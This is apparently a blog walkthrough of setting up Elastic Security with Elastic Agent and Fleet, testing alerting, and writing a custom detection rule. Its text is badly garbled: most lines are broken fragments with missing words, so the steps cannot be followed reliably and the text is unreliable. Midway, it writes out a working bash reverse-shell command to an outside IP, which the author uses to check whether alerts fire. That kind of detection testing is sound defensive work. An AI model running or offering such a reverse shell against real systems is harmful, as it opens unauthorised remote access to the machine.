30 GB storage | 1 GB RAM | Up to 2.5 vCPUin hot data tier to something as high as
3000 TB storage | 1.88 TB RAM | 240 vCPUin frozen data tier. We can also set the availability zone for each configuration.
Elastic Security integrates the free and open Elastic SIEM with Endpoint Security to prevent, detect, and respond to threats. To begin, you’ll need to add security solution related data to the Elastic Stack.
elastic-agentin our PATH.
/opt/Elastic/Agent. This directory contains all the necessary files for the standalone Elastic Agent to run.
fleet.yml. In our case, since we enable fleet, the
elastic-agent.ymlonly contains information that fleet is enabled (their config is managed centrally by fleet). The
fleet.ymlcontains the information of the agent and the fleet credentials.
datadirectory, it contains the current
elastic-agentsoftware running, which is
elastic-agentexecutable at root path is symlink-ed to the executable in this directory.
downloads, we can see the downloaded tar archives. In
install, we can see the portable
data/elastic-agent-054e22/state.yml, we can see the configuration from the Fleet.
auditdintegration beforehand, so we can see that the
auditdlogs are collected as
inputsin our agent policy. However, I see that
auditdprocess is not running in my agent, which means that Elastic Agent does not concern itself in making sure that auditd is running. In my case, I need to run
apt install auditdso this log exists:
Defaultpolicy to our agent-01.
elastic-agentare no longer working in my agent.
bash -i >& /dev/tcp/184.108.40.206/1337 0>&1. After executing this command, we didn't see any alerts. We are able to see our bash exec process in the event list, but it didn't trigger any alert, which is disappointing.
network startwith destination of our evil server. So sad that this does not generate alert.
logs-endpoint.events.*with the following query:
process.argsvalue is only
process.args, who really use the
-iflag for a legitimate action anyway? But alas, we cannot modify the prebuilt rule, so let's just create a new one.
Preview resultsto quickly test our query. In the screenshot above, we can see that it match 14 events, which seems correct. Then, we need to define the rule name, description, severity and risk score. We can also define MITRE ATT&CK™ reference, which is nice for further analysis. Then, we can set how often this rules running (e.g. every 1 minute), and what action to be taken if threats detected (e.g. send email or webhook, though this is limited only for paid license).
metricbeatprocesses. As for CPU, by average around 2% of 2 vCPU is used.